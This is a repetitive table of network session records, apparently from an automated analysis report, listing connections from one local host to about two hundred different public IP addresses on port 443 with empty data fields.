                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10072192.168.2.1347482153.165.135.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10073192.168.2.1334408213.198.216.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10074192.168.2.1336702126.20.178.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10075192.168.2.133660871.44.84.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10076192.168.2.1333294195.207.190.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10077192.168.2.1348958212.52.179.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10078192.168.2.1343326110.25.5.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10079192.168.2.134484650.122.23.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10080192.168.2.1343778173.233.27.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10081192.168.2.1351652167.168.64.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10082192.168.2.1354582107.252.98.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10083192.168.2.1359672160.196.75.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10084192.168.2.1354440134.27.141.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10085192.168.2.1353356219.203.223.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10086192.168.2.134499841.85.126.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10087192.168.2.134742472.97.102.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10088192.168.2.1341660110.174.46.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10089192.168.2.1346818144.58.178.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10090192.168.2.133626651.144.207.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10091192.168.2.134033223.32.27.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10092192.168.2.1345210212.144.190.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10093192.168.2.133410242.9.153.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10094192.168.2.1333780220.186.10.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10095192.168.2.1339956125.250.161.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10096192.168.2.134871427.126.148.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10097192.168.2.135483085.139.136.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10098192.168.2.1358946186.135.90.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10099192.168.2.133373441.130.45.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10100192.168.2.1355500194.92.109.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10101192.168.2.134808283.117.37.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10102192.168.2.1354232205.254.198.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10103192.168.2.134542438.71.92.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10104192.168.2.134357495.90.150.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10105192.168.2.133831037.9.10.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10106192.168.2.1353932152.239.221.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10107192.168.2.133317497.217.204.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10108192.168.2.134350059.219.217.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10109192.168.2.1358994131.65.221.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10110192.168.2.1343960129.212.6.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10111192.168.2.1341990202.208.8.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10112192.168.2.1350738138.202.252.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10113192.168.2.1338522220.132.110.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10114192.168.2.135902243.145.24.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10115192.168.2.135255843.48.39.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10116192.168.2.134105481.184.62.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10117192.168.2.134796831.49.234.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10118192.168.2.1333792181.48.116.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10119192.168.2.135285881.232.18.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10120192.168.2.1341270174.173.236.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10121192.168.2.1341794168.56.71.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10122192.168.2.1355828157.195.225.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10123192.168.2.1350884198.77.197.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10124192.168.2.1339728151.21.69.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10125192.168.2.134501032.180.237.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10126192.168.2.1341182107.180.222.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10127192.168.2.135237685.232.90.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10128192.168.2.1350356203.44.15.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10129192.168.2.134241876.106.12.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10130192.168.2.1347214169.213.78.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10131192.168.2.1346990105.96.247.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10132192.168.2.134709294.36.105.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10133192.168.2.1357314126.191.157.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10134192.168.2.1359088162.173.96.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10135192.168.2.1356770161.125.189.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10136192.168.2.1336462124.104.236.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10137192.168.2.136039246.222.170.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10138192.168.2.1345920219.219.117.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10139192.168.2.133644475.169.137.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10140192.168.2.1348646175.78.170.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10141192.168.2.1339158180.106.134.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10142192.168.2.1335366195.17.215.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10143192.168.2.1356820106.123.120.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10144192.168.2.134022617.72.224.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10145192.168.2.133462098.175.95.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10146192.168.2.133643249.191.17.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10147192.168.2.1337234130.111.74.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10148192.168.2.1334224140.191.101.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10149192.168.2.1347818172.188.212.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10150192.168.2.1341558130.12.18.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10151192.168.2.135246877.128.36.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10152192.168.2.1345570155.17.150.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10153192.168.2.1356154187.99.179.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10154192.168.2.1358216142.207.87.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10155192.168.2.1335216156.186.89.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10156192.168.2.1355522201.198.211.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10157192.168.2.136089447.243.207.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10158192.168.2.1344838160.181.117.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10159192.168.2.1346408139.107.135.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10160192.168.2.135361068.7.53.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10161192.168.2.1345076172.74.105.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10162192.168.2.134791637.85.102.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10163192.168.2.1358748217.179.128.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10164192.168.2.1336974180.168.102.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10165192.168.2.134391031.93.157.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10166192.168.2.1345506153.177.138.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10167192.168.2.1347980165.246.58.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10168192.168.2.134978435.223.66.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10169192.168.2.133345847.143.124.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10170192.168.2.133292891.136.215.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10171192.168.2.134485865.107.55.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10172192.168.2.1348760124.227.190.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10173192.168.2.1345450132.244.129.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10174192.168.2.135188031.242.10.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10175192.168.2.1334934132.118.152.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10176192.168.2.133841878.249.158.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10177192.168.2.1352148190.135.132.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10178192.168.2.134420692.253.211.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10179192.168.2.1351432114.90.19.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10180192.168.2.1354472130.3.120.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10181192.168.2.133434894.184.16.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10182192.168.2.134677232.211.100.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10183192.168.2.134909017.11.233.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10184192.168.2.1337364151.163.206.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10185192.168.2.135271023.113.195.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10186192.168.2.1348468210.119.229.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10187192.168.2.1344104148.245.72.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10188192.168.2.1344824156.238.81.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10189192.168.2.1335484183.174.114.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10190192.168.2.1338516150.12.80.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10191192.168.2.1356100117.115.150.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192192.168.2.1359212122.13.218.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10193192.168.2.134252049.135.96.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10194192.168.2.13452048.165.81.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10195192.168.2.134655266.24.222.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10196192.168.2.135449220.17.193.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10197192.168.2.1341562196.233.145.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10198192.168.2.1360704101.129.169.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10199192.168.2.1359712221.197.113.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10200192.168.2.1337258167.42.141.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10201192.168.2.1343746222.192.186.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10202192.168.2.133986637.28.85.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10203192.168.2.1356870106.190.88.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10204192.168.2.1348844192.75.11.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10205192.168.2.134074813.56.23.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10206192.168.2.1334326131.201.186.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10207192.168.2.1347110135.81.97.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10208192.168.2.133427617.94.155.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10209192.168.2.1338048158.147.123.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10210192.168.2.134295681.176.155.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10211192.168.2.1351446157.62.165.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10212192.168.2.1347940192.147.232.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10213192.168.2.1353976142.125.60.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10214192.168.2.1334796114.253.255.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10215192.168.2.135629073.155.83.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10216192.168.2.134986259.182.199.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10217192.168.2.135749685.159.72.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10218192.168.2.1353304185.15.142.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10219192.168.2.133385241.16.207.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10220192.168.2.1352522141.71.222.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10221192.168.2.1357602128.225.88.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10222192.168.2.135969043.104.7.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10223192.168.2.134867837.240.120.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10224192.168.2.1350842133.128.116.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10225192.168.2.134813246.15.50.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10226192.168.2.1339110182.160.250.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10227192.168.2.1342124138.127.46.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10228192.168.2.1342242128.184.38.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10229192.168.2.13541104.150.224.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10230192.168.2.1358830103.183.202.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10231192.168.2.1333400178.193.52.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10232192.168.2.134014862.108.53.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10233192.168.2.135774648.131.107.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10234192.168.2.133694079.105.237.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10235192.168.2.1335736159.132.60.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10236192.168.2.135660099.161.135.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10237192.168.2.135454020.171.93.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10238192.168.2.1340906157.33.206.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10239192.168.2.133438834.243.227.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10240192.168.2.1360156208.203.225.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10241192.168.2.1343834118.189.228.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10242192.168.2.1355232154.236.31.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10243192.168.2.135533263.52.247.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10244192.168.2.133848285.20.130.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10245192.168.2.1348430139.161.122.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10246192.168.2.1353030188.169.198.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10247192.168.2.1333448140.105.25.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10248192.168.2.135215050.4.195.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10249192.168.2.1359806212.165.39.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10250192.168.2.134607245.81.128.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10251192.168.2.1358646198.186.222.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10252192.168.2.1334168151.136.10.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10253192.168.2.1349358220.127.176.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10254192.168.2.133778848.0.52.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10255192.168.2.1359004219.29.143.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10256192.168.2.1360348202.52.139.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10257192.168.2.1335986182.245.88.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10258192.168.2.1347968163.215.118.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10259192.168.2.13348541.162.21.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10260192.168.2.133757497.13.164.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10261192.168.2.133991095.15.162.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10262192.168.2.1336650193.147.6.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10263192.168.2.134068486.40.33.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10264192.168.2.1351248130.65.182.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10265192.168.2.1358356213.203.243.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10266192.168.2.1333554136.226.130.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10267192.168.2.135252219.144.20.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10268192.168.2.135332060.14.193.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10269192.168.2.135776461.31.62.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10270192.168.2.134461842.185.168.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10271192.168.2.135619891.79.67.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10272192.168.2.1347890108.24.52.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10273192.168.2.135224663.6.144.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10274192.168.2.133515024.104.205.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10275192.168.2.1344406152.228.163.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10276192.168.2.1348790135.25.80.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10277192.168.2.1339360153.1.124.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10278192.168.2.1360068134.132.75.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10279192.168.2.1350682117.100.177.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10280192.168.2.133599437.24.6.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10281192.168.2.1358918159.161.37.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10282192.168.2.1346922116.237.242.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10283192.168.2.135815499.156.230.86443
                                                  TimestampBytes transferredDirectionData


